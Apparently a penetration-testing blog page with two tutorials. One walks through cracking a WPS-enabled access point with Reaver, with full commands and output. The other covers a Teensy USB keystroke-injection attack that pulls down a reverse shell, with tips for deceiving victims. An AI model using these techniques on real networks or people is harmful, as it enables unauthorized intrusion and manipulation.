www.n2netsec.com Reach the security summit... - Reach the Security Summit
Pentesting
Cracking WPS networks with Reaver
Recently a new tool was released to crack wifi networks. If you sat in on my previous wifi cracking discussion, you will remember that I said that trying to crack WPA/WPA2 networks was largely going to be a futile effort, due to time time needed to brute even a short preshared key.
This new attack leverages the poor design and implementation of the Wifi Protected Setup (WPS) scheme. Rather than trying to brute a lengthy passphrase, we can guarantee that we can guess the PIN for the access point in 11,000 guesses, and have the access point give us the preshared key.
WPS was intented to provide a "fast and easy" way to set up new clients on a wireless network. Rather than having to memorize a potentially lengthy passphrase, a new client could be given a simple 8 digit PIN (usually printed on the access point itself) which would authenticate the user, and the access point would then pass the configuration information to the client. Note that this attack only works against "external registrar" access points. The APs that have the "push to set up" buttons are not vulnerable, as this requires physical access to activate WPS. Many APs are set up as "external registrars", which means that they will accept a WPS setup attempt at any time, without any kind of physical button-pushing.
The PIN is 8 digits in length, meaning that there are 10^8 (100,000,000) possible combinations, but due to poor design in the WPS protocol, the attack can dramatically reduce the number of guesses necessary. Due to how the protocol works, the attacker needs to only pass half the PIN to the AP before expecting a response. This effectively turns the keyspace from 10^8 to two 10^4 (10,000) problems. In addition, the last digit is a checksum of the entire PIN, thereby making the problem 10^4 + 10^3 combinations, or 11,000 possible combinations. Big change going from 100,000,000 permutations to 11,000!
Once the PIN has been discovered, the AP will GIVE you the WPA/WPA2 passphrase. The average time to crack a WPA network using this tool is 4-10 hours.
First, download Reaver at http://code.google.com/p/reaver-wps/. Untar and compile:
tar -zxvf reaver-1.3.tar.gz
cd reaver-1.3/src
./configure && make && make install
The parameters needed to run Reaver are pretty small, just the interface and MAC address of the access point to attack. I'll show you a few other switches to throw to speed things up and provide status messages...
For this demonstration, I will be using Backtrack5 with an Alfa external USB wifi device.
First, we need a victim. I usually use the aircrack-ng suite to help out with this. First, put your wireless card in monitor mode:
root@bt:~# airmon-ng start wlan1
Interface Chipset Driver
wlan1 Realtek RTL8187L rtl8187 - [phy0]
(monitor mode enabled on mon0)
wlan0 Atheros AR2425 ath5k - [phy1]
Airmon has now created the interface mon0 as a monitoring device. Now it is time to hunt for a target. This is done using airodump-ng
root@bt:~# airodump-ng mon0
CH 4 ][ Elapsed: 12 s ][ 2012-01-09 19:14
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
A0:21:B7:7D:D0:6E -36 25 46 3 6 54e WPA TKIP PSK notyournet
A0:21:B7:A5:92:20 -36 10 60 3 2 54e. WPA2 CCMP MGT FBI Surveillance Van
From this output, we can see two of my wireless networks, "notyournet" and "FBI Surveillance Van". The FBI network uses WPA2-Enterprise (as indicated by the MGT flag under the AUTH column), so this wouldn't be a good target. The "notyournet" uses a preshared key (as indicated by the PSK under the AUTH column), and if this is a consumer-grade access point, likely supports WPS. Hopefully it supports external registrar mode! The aircrack-ng suite currently does not indicate if a network is WPS-enabled, but other devices such as my Android phone, will. I use the two together to pare down my list of potential victims. We will record the BSSID (MAC address) and channel (6) for this network.
At an absolute minimum, to run reaver we need to pass it the interface to use, and the BSSID of the access point:
root@bt:~# reaver -i mon0 -b A0:21:B7:7D:D0:6E
Reaver v1.3 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
[+] Waiting for beacon from A0:21:B7:7D:D0:6E
[+] Associated with A0:21:B7:7D:D0:6E (ESSID: notyournet)
[+] 0.05% complete @ 2012-01-09 19:26:21 (2 seconds/attempt)
And we would just let this run until we're given the PSK for this network. Go play Call of Duty for a couple of hours and come back.
But this is too slow! Let's speed things up. Maybe we're not goot at CoD...
When Reaver encounters problems, it will disassociate from the AP, scan the air and re-associate. Often, this occurs from too many bad WPS setup attempts. Some access points will disaccociate, some lock out WPS for a short amount of time. This is time consuming waiting for a rescan of all the 802.11 channels. Wouldn't it be nice if we could lock Reaver onto the channel and not waste time rescanning? Why, yes we can!
Use the -c (channel number) and --fixed options to lock reaver onto the AP's channel. We can get the AP's channel from airodump. Just remember, that there is a possiblity that the AP will hop if it determines that the air is "dirty" and will try to find a clear channel. If it does this, we won't be able to re-acquire the access point. We are trading flexibilty for speed.
root@bt:~# reaver -i mon0 -b A0:21:B7:7D:D0:6E -c 6 --fixed
Use the --dh-small option to use small Diffie-Hellman keys and speed up the process!
root@bt:~# reaver -i mon0 -b A0:21:B7:7D:D0:6E -c 6 --fixed --dh-small
I like progress messages, as I like to see what's going on and that the process hasn't locked up. Use -vv to specify very verbose mode
root@bt:~# reaver -i mon0 -b A0:21:B7:7D:D0:6E -c 6 --fixed --dh-small -vv
Reaver v1.3 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
[+] Waiting for beacon from A0:21:B7:7D:D0:6E
[+] Switching mon0 to channel 6
[+] Associated with A0:21:B7:7D:D0:6E (ESSID: notyournet)
[+] Trying pin 75102760
[+] Trying pin 20512767
[+] Trying pin 66752769
[+] Trying pin 83382765
[+] Trying pin 07602764
[+] Trying pin 76862762
[+] 0.05% complete @ 2012-01-09 19:39:46 (1 seconds/attempt)
[+] Trying pin 18712766
^C
[+] Session saved.
As you can see here, this lets us know what's going on, and doubles the brute speed. One last feature is the resume option. Any interrupted attack can be resumed by using the -s option and specifying the save file. All files are named by MAC address of the AP, with the file extension of .wpc
root@bt:~# reaver -i mon0 -b A0:21:B7:7D:D0:6E -c 6 --fixed --dh-small -s A021B77DD06E.wpc
Once cracked, Reaver will report the PIN and Preshared Key for the target network:
[+] Key cracked in 4435 seconds
[+] WPS PIN: 'xxxxxxxx'
[+] WPA PSK: 'youcantcrackme'
[+] AP SSID: 'notyournet'
It's that easy. Now that we have the WPA PSK, we can write up a config file for wpa_supplicant, and join the network. Here is what a skeleton wpa_supplicant config file looks like:
ctrl_interface=/var/run/wpa_supplicant
network={
ssid="SSID"
proto=WPA
key_mgmt=WPA-PSK
psk="KEY"
pairwise=TKIP
group=TKIP
}
Last Updated on Friday, 27 January 2012 12:36
Using SET and the Teensy Controller in Penetration Tests
Using SET and the Teensy Controller
SET is the Social Engineering Toolkit, a framework bundled with Metasploit to be used by penetration testers to facilitate the following social engineering attacks:
- Spearphishing
- Web based attacks- Java, MITM, Credential Harvester, browser_autopwn
- Infectious Media Generator
- Payload and Listener
- Mass Mailing campaign
- Arduino-Based Attack Vector
- SMS Spoofing – Send malicious SMS messages
- Wireless Attacks
The benefit of SET is that it is menu driven, rapidly updatable and extendable, and integrates seamlessly with Metasploit.
Teensy is a USB-based microcontroller in a very small form factor. All programming is done via the mini-USB port controller. Teensy is used mainly by hobbyists for various projects such as game controllers, rhythm-based door locks, and home automation.
What makes the Teensy controller interesting for penetration testers is that is has a feature that allows an attacker to successfully compromise a victim computer, even if USB removable storage and AutoRun is disallowed by the organization. How can this be? We can configure Teensy to appear as a USB-based Human Interface Device (HID). Keyboards and mice are also in the HID category and are generally allowed by an organization. Once plugged in, Teensy will send a series of keystrokes to the Operating System as if a User were typing very quickly (and without error), building our attack payload and then executing it.
What does this mean for us? We have a very small attack vector that can be easily camouflaged, plugged into a victim host, and owned within 15 seconds, even if the host is configured to not allow USB thumb drives. The attack payload is limited only by our imagination, but generally is used to download a pre-generated payload and execute it, such as a Meterpreter reverse HTTPS shell that has been run through msfvenom or msfencode.
SET will step you through all the necessary steps for building the Teensy PDE file, selecting and encoding a payload –it will even help with evasion techniques such as backdooring a known good executable, or running through several encoders. It will even start up a Metasploit payload handler.
Attacking with Teensy is relatively simple. Plug it into an open USB port. For the
attack to succeed, the workstation must be unlocked, and the entire attack takes
about 10-30 seconds, depending on the speed of the victim host- the system has
to create Registry entries, prepare the system for the new device, etc. Once that
is done, Teensy will send keyboard commands to the desktop at about 65cps. It begins by sending a Ctrl+Esc, which opens up the Windows menu, then types “CMD.EXE /c” in the Run menu. Once a command prompt is open, it will echo a short VBScript one line at a time into a .vbs file and then execute it. Typcially, SET will build a Teensy loader file that will have it echo out a HTTP downloader, which will pull a file from the attacker’s website and execute it.
Don’t touch the keyboard, as it will continue to send keystrokes to whatever window currently has focus!
On the Metasploit host, it is best to have an Autorun script that immediately migrates the shell off of the current process to a different common process, and kills the x.exe process. It is best to use Teensy when nobody is looking as this will show some desktop activity opening up a command prompt and the Run command. Use whatever excuse necessary to get the victim to look away for a few seconds. Be creative! Engage the target in some conversation, show off a magic trick, or just don’t shower for a few days.
What can we do with Teensy now that we have it set up for evil? Despite it’s small size, we can’t really go around plugging a penny sized chip with a USB cable sticking out of it…. so how about we camouflage it?
Here is just a cheap mouse from Best Buy, which I took the guts out. With a few additional lines of code, I can simulate cursor moves onscreen to make it appear as if the mouse functions. A clever attacker could play the role of a desktop support technician, or a fellow employee who thinks his mouse may be dead and wants to troubleshoot the problem to see if it’s the mouse or the computer.
In fact, this is what Netragard did recently, but expanded the concept by installing a USB hub, Teensy, and USB flash drive, all within a Logitech mouse body (which they didn’t destroy like I did). With some reconnaissance, they found a suitable victim and sent him a “promotional” mouse with all the marketing accessories to make it look legit. Three days after they FedEx’d the mouse, they got a connection back from their target. Trojan Horse? No. Trojan MOUSE.
People may begin to get wise to the “dropped USB stick” gag, or workstations may be locked down to prevent using removable storage, but new and novel attack vectors can still be employed to keep this vector fresh.
Fortunately, we are not limited to just pulling down a Meterpreter payload with Teensy. Whatever can be sent via keyboard and mouse can be sent by Teensy. Add a user, stop Windows Firewall, open a browser and visit a malicious website, stop Antivirus. The possibilities are only limited by what evil we can imagine. With some basic electronics, programming, and soldering skill, a complete and robust “plug and pwn” kit can be developed. A cheap mouse with some..ahem… new hardware, gussied up to look cutting edge and sent as a promotion is sure to get a good response.
As user awareness increases and workstations become more secure by default, we as penetration testers must seek new attack vectors. Teensy helps accomplish this as it does not appear as removable storage media to the Operating System. Linux and OSX will happily accept input from Teensy! Work is being done on Teensy to make it a more robust attack tool. The Programmable HID USB Keystroke Dongle project provides libraries and code examples to create unique attacks. The Teensy USB Development board can be purchased at http://www.pjrc.com/teensy/ .
Last Updated on Wednesday, 30 November 2011 10:09